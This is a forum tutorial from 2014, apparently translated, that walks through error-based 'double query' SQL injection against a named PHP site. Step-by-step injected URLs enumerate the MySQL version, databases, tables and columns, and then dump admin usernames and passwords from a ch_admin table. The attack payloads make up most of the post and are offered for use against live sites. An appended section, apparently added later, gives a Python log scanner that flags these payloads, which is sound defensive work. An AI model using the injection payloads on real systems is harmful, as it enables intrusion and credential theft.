07-01-2014, 01:36 PM
Assalamualaikum
Back with me again; this time the tutorial is about double query injection.
The target is censored.
http://janda.com/pro.php?id=8
Add a single quote and look at the error it produces.
Next we find the version with this command:
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Version: 5.0.96-log
Now find the database:
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Result: information_schema
At +LIMIT+0,1 we just change the value, for example 1+1, 2+1 and so on.
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+from+information_schema.tables+limit+0,1),+floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Database: challanich
Now look for the tables in the database challanich:
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+where+table_schema=0x6368616c6c616e696368+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Luckily the word admin shows up right away.
Table: ch_admin
As above, the limit 0+1 can be changed the same way as before.
Okay, moving on: now look at the columns of the table ch_admin.
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Look at the part in red.
Now we change the limit again:
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+1,1))+from+information_schema.tables+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Code:
janda/pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+where+table_schema=0x6368616c6c616e696368+AND+table_name=0x63685f61646d696e+LIMIT+3,1))+from+information_schema.tables+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
So we conclude that the important ones are: user+password
Now dump:
Code:
janda/pro.php?id=8+and+(select 1 from(select+count(*),concat((select+concat(user,0x3a,password,0x3a) from ch_admin+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1
Look at the part in red.
Okay, that's all, and thank you.
Hope it's useful.
There's a frog, teroret teroret, by the riverside, teroret teroret, looking for food, teroret teroret, every morning, teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
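For defenders, the payloads in this post share a recognizable shape: count(*), floor(rand(0)*2) and group by together inside a subquery. The following is an added example, not part of the original post, that flags that combination in web access logs; the log lines, IP addresses, the search.php path and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Traits of the double-query payloads quoted in this post; all three must co-occur.
CORE = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\("),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)"),
    "group_by": re.compile(r"\bgroup\s+by\b"),
}
# Weaker signals: worth a look on their own, not conclusive.
WEAK = {
    "subselect": re.compile(r"\(\s*select\b"),
    "info_schema": re.compile(r"\binformation_schema\b"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.*?) HTTP/\d')

def normalize(query):
    """Decode '+' and %xx (up to 3 rounds for double encoding), fold case and whitespace."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query).lower()

def classify(log_line):
    """Return (verdict, sorted trait names) for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return "unparsed", []
    query = normalize(m.group(1).partition("?")[2])
    core = [n for n, rx in CORE.items() if rx.search(query)]
    weak = [n for n, rx in WEAK.items() if rx.search(query)]
    verdict = "double-query" if len(core) == len(CORE) else "review" if weak else "clean"
    return verdict, sorted(core + weak)

# Constructed log lines (documentation IPs); the payload is the version query quoted in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jul/2014:13:40:02 +0700] "GET /pro.php?id=8 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jul/2014:13:41:10 +0700] "GET /pro.php?id=8+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),+0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 HTTP/1.1" 200 412',
    '198.51.100.9 - - [01/Jul/2014:13:42:31 +0700] "GET /search.php?q=group+by+clause+tutorial HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line))
```

A hit only shows that someone tried; the fix is to bind id as a query parameter (or cast it to an integer) in pro.php and to stop returning database errors to the client.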